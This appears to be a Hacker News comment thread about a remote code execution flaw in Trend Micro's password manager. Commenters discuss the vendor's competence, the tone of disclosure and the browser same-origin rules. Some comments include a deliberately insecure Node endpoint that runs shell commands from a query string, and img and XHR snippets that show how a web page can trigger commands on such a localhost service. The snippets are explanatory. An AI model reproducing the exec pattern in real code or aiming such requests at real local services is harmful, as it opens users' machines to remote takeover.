No, I do not feel bad for them at all. More and more often we see that antivirus products are total scams. The people behind them are basically criminal. They install rogue certificates, are full of exploitable vectors, share our data with third parties, inject ads into our browser traffic, and are just horrible and slow our computers down. From a security perspective, installing an AV actually sounds like a really bad idea these days. They're basically really horrible viruses in disguise. The most horrible kind of virus. These people need to be shamed and I wish these companies nothing but the worst.


The worst thing is that they exploit peoples' fears. You'll get eaten by the big scary virus monster and lose everything, unless you install our helpful software for just $99.95! Your average mom and pop computer user has no idea whether it's really needed or not.


I still sympathize with a subset of the ICs: those who must see so many problems (maybe even futilely trying to fix them) but are kept from doing much by internal dynamics. I wish them the courage to pack up and leave for someplace better; as for those who have been responsible long-term, I agree with you.


They're grossly incompetent. You don't feel bad for people who are grossly incompetent, you feel bad for the victims of their incompetence.


Windows Defender is the only AV I trust to not totally duck up my PC.


It's pretty much ineffectual though, as Microsoft themselves admitted some time ago.

It consistently scored lower than most other products in detections/heuristics.

The only thing it has going for it is the light footprint.


I think the other might be that it doesn't have glaring, obvious holes like Trend Micro.


Can someone ELI5 why TrendMicro would do this? Sincerely--I don't know what they get out of it, unless they're bad guys. Not trying to be snarky here.


This seems like a textbook case of Hanlon's Razor (https://en.wikipedia.org/wiki/Hanlon's_razor, "Never attribute to malice that which is adequately explained by stupidity"). They wanted some way for their website to interact with the user's local installation of their software, and somehow arrived at the idea of running a web server on localhost and accessing it from their website, without thinking through the security implications at all. Even their responses in this bug show that they still don't really understand the implications.

Less broken software tends to solve this same problem using a browser extension with a whitelisted domain for access, but that has the disadvantage of requiring a browser extension for each browser, and doesn't fully protect against hostile networks. Including the "https://" in the whitelist would provide somewhat more security, especially with HSTS, a pinned certificate, and a carefully-audited single-purpose domain.
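
As a sketch of that extension approach (all names hypothetical; `externally_connectable` is Chrome's mechanism for whitelisting which web origins may message an extension):

    {
      "name": "Vendor Companion",
      "version": "1.0",
      "manifest_version": 2,
      "background": { "scripts": ["background.js"] },
      "externally_connectable": {
        "matches": ["https://account.vendor.example/*"]
      }
    }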

But an even better design would eliminate the entire concept of connecting back from the vendor website to the client software. Sometimes the right answer to "how do I" is "don't".


Thanks for the explanation, and...

    Sometimes the right answer to "how do I" is "don't".
Beautifully put.


Some programmer on a project sees a lot of code that's calling out to various Windows functions and thinks, "You know, it'd be a clean refactor if I just merge all these into a single abstract route on the server that could call any Windows function."


Okay, so piecing this together, let me know if I am correct: the TrendMicro password manager will utilize a ShellExecute call to open a URL defined in a query string? I feel like not trusting/passing $_GET/$_REQUEST params was one of the first things that I learned when doing PHP development 12 years ago. Is this a concept that needs revisiting with new-age Node developers?


The problem wasn't that they were trusting GET params; it's that they forgot they weren't the only ones capable of sending requests. If you wrote a website that could only be accessed by people/computers you trust, then trusting the parameters is no problem.

TL;DR It's not how the data is sent but where it came from.
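
For what it's worth, a sketch of what checking the source might look like (hostname hypothetical), though as noted elsewhere in the thread an origin check alone is a weak fix:

    // Minimal origin allowlist on a localhost HTTP service. Sketch only.
    const http = require('http');

    const ALLOWED = new Set(['https://pwm.vendor.example']);

    http.createServer((req, res) => {
      const origin = req.headers.origin;
      // Note: simple GETs (e.g. an <img> tag) may carry no Origin header
      // at all, which is one reason this check by itself is not enough.
      if (!origin || !ALLOWED.has(origin)) {
        res.writeHead(403);
        return res.end('forbidden');
      }
      res.end('ok');
    }).listen(49155, 'localhost');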


Oh okay, so the expectation was that the web server the application ran would be private to the application and nothing else. I wasn't aware that apps ran their own web servers; how often is that done?


Obviously at least once too often. :)


On the Internet, you can't always tell where the data comes from. I mean, software needs to do proper authentication.


>let's worry about that screw up after you get the remote code execution under control. Please confirm you understand this report.

This is an awful vulnerability and their immediate attempts at mitigation are sad, but I feel like the Open Source community could do itself a lot of favors by avoiding this kind of tone. Not everyone working as a programmer is as good as you. Not everyone working as a programmer is any good. If you care about security here, why not concentrate on educating them? It's pretty likely the devs at any consumer hardware company aren't world-beaters; if we wanted that, we would be willing to pay more than $100 for a router. It's also likely any large company has a chain of command these things have to go down through and back up again, and for every link in that chain there's a greater-than-zero chance the person has no idea about proper security. You may feel the security flaw is an obvious red flag that should have people's hair on fire, but not everyone understands what you do.


> Not everyone working as a programmer is as good as you. Not everyone working as a programmer is any good.

sure. But then don't work on a security software suite. Or have bosses who properly code-review the commits.

During the time this vulnerability existed, machines running TrendMicro were infinitely less secure than machines not running the security software. This is severely wrong and IMHO warrants the very harsh tone.

This wasn't some obscure buffer overflow or sandbox escape vulnerability. This was running an RPC server over HTTP allowing full remote code execution over JSONP (or an <img> tag, for that matter).


I agree with you with regard to the tone, but when your company description is "a global leader in internet content security software and cloud computing security with a focus on data security, virtualization, endpoint protection" (emphasis mine), at some point somebody has to take some responsibility.


> but I feel like the Open Source community could do itself a lot of favors by avoiding this kind of tone.

To be accurate, that comment was from a security researcher at Google commenting on a closed-source software project. I agree that the tone of the comment was not beneficial, but I don't view it as being associated with or reflective of the open source community.


Not everybody has to catch those flaws. But if you are a security company and RELEASE that kind of crap, then it wasn't an instance of a poor guy new to security making a mistake; it is a catastrophic failure of your entire organization. Not properly fixing it means that even after they were informed of the issue, they weren't able to put people with the necessary skills on it. Which means either that the message didn't reach the appropriate people or that they don't employ enough of them. In either case, you should not sell security products.

This is no small bug that was overlooked in a code review. The pure idea of several things in it is so crazy that even suggesting them is a massive red flag. Actually implementing it?!

If it goes through a chain of command, then ONE person realizing how bad this is should be enough.

(Also, what "Open Source community"?)


> If you care about security here, why not concentrate on educating them.

They are selling a security product. They are the ones that should already know these things.


To add on to this, by submitting the bug report, Tavis did not somehow magically become responsible for educating Trend Micro programmers about security.


1) This is Google, not the open source community.

2) If you are releasing a security product you don't understand, this is worse than not releasing anything. Normally I'm with you, but this is security. If you need to educate them, __they should not be releasing software__. This is downright irresponsible and harmful. It's like attaching velcro to a door, calling it a lock, and selling it as a competitor to ACTUAL LOCKSMITHS.


'If you are releasing a security product you don't understand, this is worse than not releasing anything.'

In a perfect world this would never happen...

However we do not live in that perfect world. Far from it.

The reality is all over the world and all of the time, software and a great many other things are designed and sold, and the person who 'knows how it all works' leaves.

New people are hired. Some are good, and some are not. People quit, get illnesses, even die, and life goes on.

When you solve ALL of those possible issues, then you can beat that drum all you want. Until then though, this comment is petty at best...


> When you solve ALL of those possible issues, then you can beat that drum all you want. Until then though, this comment is petty at best...

Would you say this in response to someone who harshly reprimanded the designer(s) and implementer(s) of the original Therac-25 control software? [0] If not, why not?

[0] https://en.wikipedia.org/wiki/Therac-25


Thanks for asking.

In the case of danger/damage to human lives a la direct physical injury, there should be a much higher standard.

It is why there exists murder in the first, second, or third degree; with very different punishments.

There is a 'minimum standard' that must always be followed.

I guess you will disagree, but comparing a programming design error in an antivirus product to the Therac incident falls outside normal deterministic logic, and would actually make my point. As someone who has made software for many years: it is not reasonable to expect a Therac or NASA level of diligence.

This is what courts have upheld as well.


> In the case of danger/damage to human lives a la direct physical injury, there should be a much higher standard.

Agreed. In some jurisdictions, people rely on security software to keep them from being identified, and then tortured and/or killed by their governments.

If a given piece of security software that claims to protect its users instead makes them substantially more vulnerable to attacks that would reveal information stored on their machines and/or permit the attacker to install arbitrary software of their own choosing, that is both a breach of trust and -in some jurisdictions- tantamount to handing that user over to the jurisdiction's Inquisitors.

> This is what courts have upheld as well.

Courts have repeatedly upheld that members of the American public don't have standing to challenge the NSA's dragnet domestic surveillance program. While the notion of standing has great value in helping to prevent groundless suits from wasting everyone's time and money, [0] it's pretty clear that the courts

* Are slow to adapt to rapid changes in the nature of the activities they're supposed to adjudicate

* _Often_ fail to be as infallible as they wish they were

While it may not be illegal to be an incompetent security software vendor in America, I -and many others [1] in the industry- think it's entirely reasonable to name, shame, and disparage companies that deem it acceptable to ship "security software" that contains vulnerabilities that anyone with a year of relevant experience [2] under their belt would be able to spot and fix.

> ...it is not reasonable to expect a Therac or NASA level of diligence.

While it would be ideal for security software companies to adopt avionics-software-style design and QA procedures, the errors found by Ormandy are things that would have been obvious to anyone with more than a year in the industry... It's obvious to anyone who reads that bug report that Trend Micro couldn't be arsed to do the industry-standard level of QA and have one of their mid-level guys spend a couple of hours reviewing this part of their consumer-level security software.

While Trend Micro might not be legally liable for it, that's still negligence.

[0] Yes. I'm very aware that court is expensive, slow, and often used as a cudgel against regular folks by people who have rather deep pockets. The requirement to prove standing likely prevents far more nuisance suits than it kills suits that should be heard and judged.

[1] Frankly, I hope that most folks in this business hold this opinion.

[2] In this case, web development experience.


> do itself a lot of favors by avoiding this kind of tone

Honestly, I'm impressed that Tavis keeps the tone as professional as he does. This vulnerability and the AVG one from last month (https://news.ycombinator.com/item?id=10803467) are both head-slappingly stupid, just entire features that are ill-conceived and poorly implemented, and from software companies that should know better.


I would agree with you if the software in question weren't a password manager. If you publish software whose focus is security and show that you don't understand basic security issues, then some direct words seem quite appropriate to me, and the reaction from some [business] users might be much, much harsher.


Your points are valid if we're talking about a pull request on some amateur jQuery parallax effect plugin, not anti-virus software.


No. There's exactly 1 excuse for creating an API which exposes passwords and root execution: it's when it's actually secure to do so. And there's 0 excuse for the chain of command not understanding the product a company is building.

I'm not saying we should tell off support people when this happens. But they have to show solidarity with customers whose security and privacy were exposed, by accepting the coarse language when it comes.


You may feel the security flaw is an obvious red flag that should have people's hair on fire, but not everyone understands what you do.

Horseshit. Having a publicly-exposed HTTP endpoint that enables arbitrary code execution is so goddamn stupid that even an intern with room-temperature intelligence should've been like, "Hey, isn't this a possible vulnerability?"
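To make the anti-pattern concrete: the bug class boils down to something shaped like the following Node sketch. The names and port are hypothetical, not Trend Micro's actual code; it's only the shape of the flaw.

    // DO NOT ship this: an HTTP endpoint that hands attacker-controlled
    // input straight to a shell. Hypothetical names and port.
    var http = require('http');
    var url = require('url');
    var exec = require('child_process').exec;

    http.createServer(function (req, res) {
      var cmd = url.parse(req.url, true).query.cmd;
      if (!cmd) { res.statusCode = 400; return res.end('missing cmd'); }
      // Any web page can trigger this with a plain GET request.
      exec(cmd, function () { res.end('done'); });
    }).listen(49152, 'localhost');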

I'm all for the principle of charity, but if you are in a field where people are counting on you not to be a rank amateur then you better step up your game and not be surprised if they call you out on your incompetence.

I'll humor a kid who screws up carving a turkey--but if they claim to be a neurosurgeon, they damned well better have a steady hand.


Are you trying to say it was a mistake that allowed the unsigned, non-origin-checked decryption and upload of all passwords? It looks much more like that was how they designed it.

[IANA-Programmer FWIW]

Also, how is an origin check a fix? Like, great, now only Trend Micro (and, presumably, any impersonators via DNS poisoning or similar tricks) can read all my passwords in plain text??
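(For context, an "origin check" here would mean something like the sketch below. The origin string and port are hypothetical, not anything from the actual product, and it shows exactly why such a check only narrows the attack rather than eliminating it:)

    // Reject requests unless the Origin header matches an allowed value.
    // This stops random web pages, but anyone who can impersonate the
    // allowed origin (DNS poisoning, etc.) sails right through.
    var http = require('http');

    http.createServer(function (req, res) {
      if (req.headers.origin !== 'https://client.trendmicro.example') {
        res.statusCode = 403;
        return res.end('forbidden');
      }
      res.end('ok'); // the real handler would go here
    }).listen(49152, 'localhost');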

>It's also likely any large company has a chain of command these things have to go down through and back up again and for every link in that chain there's a greater than 0 chance the person has no idea about proper security. //

When the locks need changing in a school, it doesn't matter that the headteacher has no idea how to fit a lock, nor which lock needs putting on which door; they have an employee with some competency in the field (caretaker/janitor), sufficient to watch an outside expert (a locksmith, say) perform and certify the work. If the locksmith says "just paint the door with a brick pattern and don't bother with locks", then the janitor should realise that's not sufficient.

>It's pretty likely the devs at any consumer hardware company aren't world-beaters //

Trend Micro are a security software company, aren't they? From their website:

"As a global leader in IT security, Trend Micro develops innovative security solutions that make the world safe for businesses and consumers to exchange digital information. With over 25 years of security expertise, we’re recognized as the market leader in server security, cloud security, and small business content security."

Come on. A "global leader in IT security" can tell that exposing a remote code exploit across your entire install base is worth paying a not-rubbish programmer to get in there ASAP and fix the product.


I think the tone is actually quite restrained given the situation.


> I feel like the Open Source community could do itself a lot of favors by avoiding this kind of tone.

As someone who regularly discloses vulnerabilities in open source software, I respectfully disagree with this statement. You are, of course, welcome to have your own opinion.


Not every engineer is top of the line, so when the bridge fails we aren't doing ourselves a lot of favors by adopting a harsh tone.

The truth is that technology has gotten to the point where poor security is lethal. From vehicles to medical devices, poor security can now allow a bad actor to put others in harm's way.

Now, mistakes happen. No one is perfect. But we should demand the adoption of systems that do their best to minimize the potential damage of human mistakes.

Now, yelling at the construction worker because the bridge was poorly engineered is not at all effective. But the problem here isn't the tone, only that it needs to be directed higher in the organization.


1/11 Trend Micro. Never forget! I can see how it can happen, I really can. A few code reviews back, I had to request a fix for a remote path traversal that could read any file on the system.

This is worse since TM is an AV vendor and probably has this deployed across so many desktops.


> This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Why is it visible already?


Because there is a broadly available patch. See e.g. https://googleonlinesecurity.blogspot.com/2015/02/feedback-a...


because it's "fixed"


Can anyone explain why a security product needs a local HTTP server, or why it needs endpoints at all, let alone 70?

And WTF, why would it have components written in Node or JavaScript?


In regard to your second question: why wouldn't you write components in a modern, generally well-sandboxed, safe language? (Of course you shouldn't break the sandbox to do so, but using JS in general is not a bad thing.)


I guess my (potentially old-school) thinking is that for something that needs to be as solid as a security layer, integrated with the OS, I would only consider memory- and type-safe languages.


JS's type unsafety can lead to exceptions, not buffer overflows.
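A tiny sketch of what that means in practice:

    // A JS type error surfaces as a runtime exception instead of the
    // silent memory corruption a C buffer overflow can cause.
    var user; // undefined
    try {
      console.log(user.name);
    } catch (e) {
      console.log(e instanceof TypeError); // true: it throws, it
    }                                      // doesn't scribble over memory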


This seems to be a relatively stand-alone app, not connected to the main scanning engine.

And I'd say they probably use C or C++ for most other things, which isn't exactly safer.


Why do browsers let websites send AJAX requests to localhost anyway? I feel like that's bound to cause trouble.


Arbitrary requests to localhost aren't permitted, unless the page itself is on localhost. (Just as evil.com can't make arbitrary requests to google.com.) That said, there are a bunch of exceptions. They don't really matter here: the bug report showed that an exploit was possible with a GET request, and you don't need AJAX to make a GET request. A <script> or an <img> tag is, under the hood, a GET request. Taking the second case (making a GET request through an <img> tag), the response likely won't be an image, so it won't display, but we don't know that until long after the request has executed, so it's too late.
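To illustrate (the port and path below are made up):

    // Any page you merely visit can do this. Setting src is enough to
    // send the GET; the response isn't a valid image, so nothing
    // renders, but the request has already hit the server.
    var img = new Image();
    img.src = 'http://localhost:49152/api/some_endpoint?cmd=calc.exe';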

You'd have to restrict where images can come from (people wouldn't be able to use CDNs?), where scripts come from (a lot of sites load jQuery from Google), you couldn't allow JS redirects. You'd have to forbid JS from automatically submitting <forms>. CSS on odd domains. Webfonts. Videos, audio. I'm sure there are things I'm missing.

Back on the AJAX side of things, JS can make GET requests through AJAX. The server has to send back a special header for the script to get the response, but if it doesn't, the request is still executed. (The idea being that, since you can execute GET requests using any of the aforementioned methods, allowing JS to do it isn't going to allow anything new. GET also isn't supposed to have side effects like this buggy endpoint has … GET was an extremely poor choice here.)
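Concretely (same made-up endpoint as above):

    // A cross-origin GET via XHR. Without an Access-Control-Allow-Origin
    // header in the response, the script can't read the reply, but the
    // server has already received and acted on the request.
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://localhost:49152/api/some_endpoint?cmd=calc.exe');
    xhr.send();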

More arbitrary requests are permitted, but only on the condition that the server explicitly allows them, via what is called a preflight request. (Note that GET isn't the only exception to preflighting; see [1] and the sketch below.)

[1]: https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_con...
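And for contrast, a sketch of a request that would be preflighted (same made-up endpoint again):

    // The custom header makes this a non-simple request, so the browser
    // sends an OPTIONS preflight first; the DELETE itself is only sent
    // if the server's CORS response explicitly allows it.
    var xhr = new XMLHttpRequest();
    xhr.open('DELETE', 'http://localhost:49152/api/some_endpoint');
    xhr.setRequestHeader('X-Custom', '1');
    xhr.send();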


Yeah, I forgot about the exceptions to the Same Origin Policy for a moment there.

Still, I don't see why sites should ever be able to make any request to localhost.


It shouldn't cause a problem unless malicious software is already installed on the user's machine.


It's pretty standard when you're developing a web application. Your backend runs on your machine, your frontend requests stuff from within the browser.


Sure, but why can external sites access localhost?


The external sites don't access it; they just ask the browser to load an image. So the external site can't read the result, but that's not actually stopping them from owning your machine.


For one, it seems useful for any kind of local web development; plus there are lots of consumer applications that run locally as a web app, like Plex, for instance.


Sure, for local web dev and apps. But why can websites on the Internet make requests to localhost?


I'm lost for words...


It's "enterprise"!


Jesus Christ on ten motorbikes!


Jesus Christ on ten motorbikes.


What could possibly go wrong?


I'm kind of surprised that their reaction is to expect Tavis to continue to volunteer his time to audit the security of their product.


They're asking him to help verify the fix since he's in the best position to do so, having caught the bug. I think this is better than them saying "thanks, we'll take it from here, bye"


Asking the reporter to check the fix is standard behaviour in my experience, and what I would expect as the reporter.


Someone isn't understanding where to escalate this, maybe because the working conditions at Trend Micro suggest that some low-level developer would be blamed for it. It's definitely not a developer's fault that this wasn't audited, and probably not even the product manager's.

Seriously, the CIO should be fired for this. It's really that unacceptable. And it's not just one attack surface exposed by this.


They asked nicely. And they don't seem to be able to tell if they've fixed it, so they really have no choice but to beg.


This, by the way, is the new normal. Organizations, teams, and individuals within an organization, especially its bureaucracy, have self-preservation and keeping their status in mind rather than any engineering discipline, let alone craftsmanship. Such is the nature of any bloated social formation, be it a government, church, army, or corporation.

The very first person who suggested a Node HTTP server should have been fired that very day for offensive incompetence. I could hardly imagine a more satirical example. A hypervisor in Java, perhaps.

But idiots keep bullshitting other idiots (PHP, Mongo, Node, Hadoop - you name it) whose only concern is to convince those one step higher in the hierarchy that they are still worth keeping, so any bizarre mix of memes trending [among idiots] will do.

Hey, Beavis, Node is cool, huh huh. Single-threaded callback hell in a language with implicit coercion and no standard module system (let alone versioning), as yet another useless layer of complexity to soak up man-hours for one more year? Lol wut? Node is cool.

So, all this is rather normal.


>I could hardly imagine a more satirical example. A hypervisor in Java, perhaps

Nice imaginative example - a hypervisor in Java. I almost get a panic attack launching Eclipse and then having to wait for it to appear. Contrast that with Chrome/FF launching with umpteen tabs, or SublimeText. Clearly lots of people routinely get technology choice wrong.


So what technologies do you actually like for writing web servers?

I think this comment is a good example of "contempt culture," which we've probably all been guilty of, and which we should do less.

http://blog.aurynn.com/86/contempt-culture


A considerable amount of intelligence is required to understand that nginx, due to its design choices and attention to implementation details (hallmarks of truly remarkable systems such as Plan9/Inferno, Erlang, Smalltalk, etc.), is more portable than Node (it runs on more architectures, including Windows), requires an order of magnitude fewer resources while providing close-to-optimal efficiency, and can easily be extended via modules and scripted in Lua with fewer lines of code, less pain, and less nonsense.

BTW, contempt for incompetence or corruption is a natural and healthy emotion. It is what contempt evolved for.


> The very first person who suggested a Node HTTP server should have been fired that very day for offensive incompetence.

I suspect it was an MBA who wanted to use cheaper JS developers on the project.


The funny part is how the Trend Micro guys keep asking Tavis to validate their fix, as if he's their tech support guy.


This is why I don't like installing free AV or paid AV, or doing anything but burning my computer and living in the woods.



